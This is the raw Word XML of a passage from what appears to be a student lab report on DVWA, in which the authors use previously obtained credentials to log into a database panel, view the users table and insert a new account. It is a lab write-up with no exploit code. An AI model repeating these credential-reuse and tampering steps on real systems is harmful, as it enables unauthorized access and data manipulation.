    <w:p w14:paraId="745DB1CE" w14:textId="110223B5" w:rsidR="009C5A17" w:rsidRDefault="009C5A17" w:rsidP="00D53FD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc41839636"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tampering with the </w:t>
      </w:r>
      <w:r w:rsidR="0027516E">
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>atabase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1FA0EFE6" w14:textId="1578D86F" w:rsidR="00C95FAA" w:rsidRPr="00376E89" w:rsidRDefault="00F25728" w:rsidP="00C95FAA">
      <w:r>
        <w:t xml:space="preserve">After clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F25728">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the menu bar, </w:t>
      </w:r>
      <w:r w:rsidR="00E14157">
        <w:t xml:space="preserve">we were able to </w:t>
      </w:r>
      <w:r w:rsidR="00CD10AB">
        <w:t>fill the form in</w:t>
      </w:r>
      <w:r w:rsidR="00EC2FF5">
        <w:t xml:space="preserve"> using the credentials we </w:t>
      </w:r>
      <w:r w:rsidR="00596170">
        <w:t xml:space="preserve">procured in </w:t>
      </w:r>
      <w:r w:rsidR="0043069C" w:rsidRPr="00C50107">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 14 </w:t>
      </w:r>
      <w:r w:rsidR="00D95EDB" w:rsidRPr="00C50107">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Page</w:t>
      </w:r>
      <w:r w:rsidR="00C50107" w:rsidRPr="00C50107">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 14</w:t>
      </w:r>
      <w:r w:rsidR="00D95EDB" w:rsidRPr="00C50107">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D038E9">
        <w:t xml:space="preserve"> and hit </w:t>
      </w:r>
      <w:r w:rsidR="00D038E9" w:rsidRPr="00D038E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Connect</w:t>
      </w:r>
      <w:r w:rsidR="00D038E9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6FE0E1" w14:textId="302E8E7E" w:rsidR="00D038E9" w:rsidRDefault="00FF5ACE" w:rsidP="00D038E9">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CA85384" wp14:editId="5E58EE40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>3552825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2321560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="30" name="Flowchart: Alternate Process 30"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="419100" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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29911" id="Flowchart: Alternate Process 30" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:279.75pt;margin-top:182.8pt;width:33pt;height:9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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00332794">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5569802C" wp14:editId="7484FC43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2724149</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1330960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="180975" cy="104775"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Flowchart: Alternate Process 29"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="180975" cy="104775"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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F04F8" id="Flowchart: Alternate Process 29" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:214.5pt;margin-top:104.8pt;width:14.25pt;height:8.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E50AB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EE6473B" wp14:editId="25622C6A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1847850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1921510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2647950" cy="561975"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Flowchart: Alternate Process 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2647950" cy="561975"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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947CB" id="Flowchart: Alternate Process 28" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:145.5pt;margin-top:151.3pt;width:208.5pt;height:44.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D53FD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="393215CA" wp14:editId="65F4220F">
            <wp:extent cx="5878286" cy="3415478"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="A screenshot of a flat screen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9.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5280" r="10455" b="2224"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5902016" cy="3429266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="594736A5" w14:textId="67FFD405" w:rsidR="00D53FD9" w:rsidRDefault="00D038E9" w:rsidP="00D038E9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Filling in the form using the credentials from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D038E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Figure 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE682DF" w14:textId="5679EA0F" w:rsidR="007F208C" w:rsidRPr="00284020" w:rsidRDefault="007F208C" w:rsidP="007F208C">
      <w:r>
        <w:t xml:space="preserve">After clicking </w:t>
      </w:r>
      <w:r w:rsidRPr="007F208C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nn</w:t>
      </w:r>
      <w:r w:rsidRPr="007F208C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ect</w:t>
      </w:r>
      <w:r w:rsidRPr="007F208C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00284020">
        <w:t>we were able to view th</w:t>
      </w:r>
      <w:r w:rsidR="00B64AEC">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00284020">
        <w:t xml:space="preserve"> tables in </w:t>
      </w:r>
      <w:r w:rsidR="00284020" w:rsidRPr="00284020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r w:rsidR="00284020">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00284020">
        <w:t xml:space="preserve">and clicked on </w:t>
      </w:r>
      <w:r w:rsidR="00284020" w:rsidRPr="00FA71A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="00A13182">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B28C5D3" w14:textId="051D3A3D" w:rsidR="00A13182" w:rsidRDefault="00F041C9" w:rsidP="00A13182">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00D0597E" wp14:editId="5BA7EF6F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1790699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2258695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="238125" cy="142875"/>
                <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Flowchart: Alternate Process 31"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="238125" cy="142875"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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E9F05" id="Flowchart: Alternate Process 31" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:141pt;margin-top:177.85pt;width:18.75pt;height:11.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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003351F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EAB6F9A" wp14:editId="5B3BEEA6">
            <wp:extent cx="5942214" cy="2918529"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="A screenshot of a flat screen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0.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5147" b="7538"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2919210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8858AD" w14:textId="106745E5" w:rsidR="003351F3" w:rsidRDefault="00A13182" w:rsidP="00B64AEC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Vie</w:t>
      </w:r>
      <w:r w:rsidR="00B64AEC">
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00B64AEC">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all tables in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B0D07" w14:textId="18D69848" w:rsidR="00FA71A9" w:rsidRDefault="00FA71A9" w:rsidP="00FA71A9"/>
    <w:p w14:paraId="67535BFA" w14:textId="119A189A" w:rsidR="00150AA9" w:rsidRPr="00D52781" w:rsidRDefault="002B69EA" w:rsidP="00FA71A9">
      <w:r>
        <w:t xml:space="preserve">After clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="002B69EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, we were </w:t>
      </w:r>
      <w:r w:rsidR="000519D4">
        <w:t>able</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view all the records stored in the table.</w:t>
      </w:r>
      <w:r w:rsidR="00D52781">
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00D52781">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">clicked on </w:t>
      </w:r>
      <w:r w:rsidR="00D52781" w:rsidRPr="00D52781">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Insert</w:t>
      </w:r>
      <w:r w:rsidR="00D52781">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0014092A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A382D7" w14:textId="6FC3526A" w:rsidR="003600D2" w:rsidRDefault="00F041C9" w:rsidP="003600D2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="238C2D4B" wp14:editId="05F31AEA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2581275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3324225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="449" name="Flowchart: Alternate Process 449"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="419100" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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71C0C" id="Flowchart: Alternate Process 449" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:203.25pt;margin-top:261.75pt;width:33pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>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1C6722ED" wp14:editId="22E50470">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>3048000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1009650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="419100" cy="114300"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="448" name="Flowchart: Alternate Process 448"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="419100" cy="114300"/>
                        </a:xfrm>
                        <a:prstGeom prst="flowChartAlternateProcess">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="2857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B158B" id="Flowchart: Alternate Process 448" o:spid="_x0000_s1026" type="#_x0000_t176" style="position:absolute;margin-left:240pt;margin-top:79.5pt;width:33pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt">
                <v:stroke joinstyle="round"/>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00150AA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55092E56" wp14:editId="5BD1C099">
            <wp:extent cx="5886450" cy="3681093"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17"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1 (1).png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="5144" r="18034" b="3730"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5899387" cy="3689183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E43FFD" w14:textId="21EACA25" w:rsidR="00150AA9" w:rsidRDefault="003600D2" w:rsidP="003600D2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00323960">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidR="00474588">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Viewing all the records clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="003600D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to add a new record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5F8BC" w14:textId="648CA414" w:rsidR="003600D2" w:rsidRDefault="003600D2" w:rsidP="003600D2">
      <w:r>
        <w:t xml:space="preserve">After clicking on </w:t>
      </w:r>
      <w:r w:rsidRPr="003600D2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Insert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00453C00">
        <w:t>we were able to add a new record by filling in the following the information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F7739" w14:textId="1AE395BA" w:rsidR="00453C00" w:rsidRDefault="005B5B0B" w:rsidP="00422394">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00F13DE0">
        <w:t>ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">_id : </w:t>
      </w:r>
      <w:r w:rsidR="00050B25">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3BFD0" w14:textId="3EC8999C" w:rsidR="00050B25" w:rsidRDefault="00050B25" w:rsidP="00422394">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>first_name :</w:t>
      </w:r>
      <w:r w:rsidR="008459D2">
        <w:t xml:space="preserve"> Saumya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD0A4A" w14:textId="6F0B6476" w:rsidR="00050B25" w:rsidRDefault="00050B25" w:rsidP="00422394">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>last_name :</w:t>
      </w:r>
      <w:r w:rsidR="008459D2">
        <w:t xml:space="preserve"> Rastogi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB93C5C" w14:textId="10993970" w:rsidR="00050B25" w:rsidRDefault="00050B25" w:rsidP="00422394">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>user :</w:t>
      </w:r>
      <w:r w:rsidR="008459D2">
        <w:t xml:space="preserve"> Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C2F924" w14:textId="43F25C1D" w:rsidR="00050B25" w:rsidRDefault="00050B25" w:rsidP="00422394">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>password :</w:t>
      </w:r>
      <w:r w:rsidR="00422394">
        <w:t xml:space="preserve"> Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01322B" w14:textId="6DC38E7F" w:rsidR="00050B25" w:rsidRDefault="008459D2" w:rsidP="003600D2">
      <w:r>
        <w:t xml:space="preserve">avatar : </w:t>
      </w:r>
      <w:r w:rsidR="00422394">
        <w:t>NA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E9833" w14:textId="54C2BD84" w:rsidR="001A2BC5" w:rsidRDefault="00613DD4" w:rsidP="003600D2">
      <w:r>
        <w:t>Fo</w:t>
      </w:r>
      <w:r w:rsidR="00896EA8">
        <w:t xml:space="preserve">r password, we had </w:t>
      </w:r>
      <w:r w:rsidR="00B363DF">
        <w:t xml:space="preserve">to select </w:t>
      </w:r>
      <w:r w:rsidR="00B363DF" w:rsidRPr="00B363DF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PASSWORD</w:t>
      </w:r>
      <w:r w:rsidR="00B363DF">
        <w:t xml:space="preserve"> on the drop-down menu under </w:t>
      </w:r>
      <w:r w:rsidR="00B363DF" w:rsidRPr="00B363DF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidR="00B363DF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004D1952">
        <w:t xml:space="preserve"> Then we clicked on </w:t>
      </w:r>
      <w:r w:rsidR="004D1952" w:rsidRPr="004D1952">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Confirm</w:t>
      </w:r>
      <w:r w:rsidR="004D1952">
        <w:t>.</w:t>
      </w:r>
    </w:p>
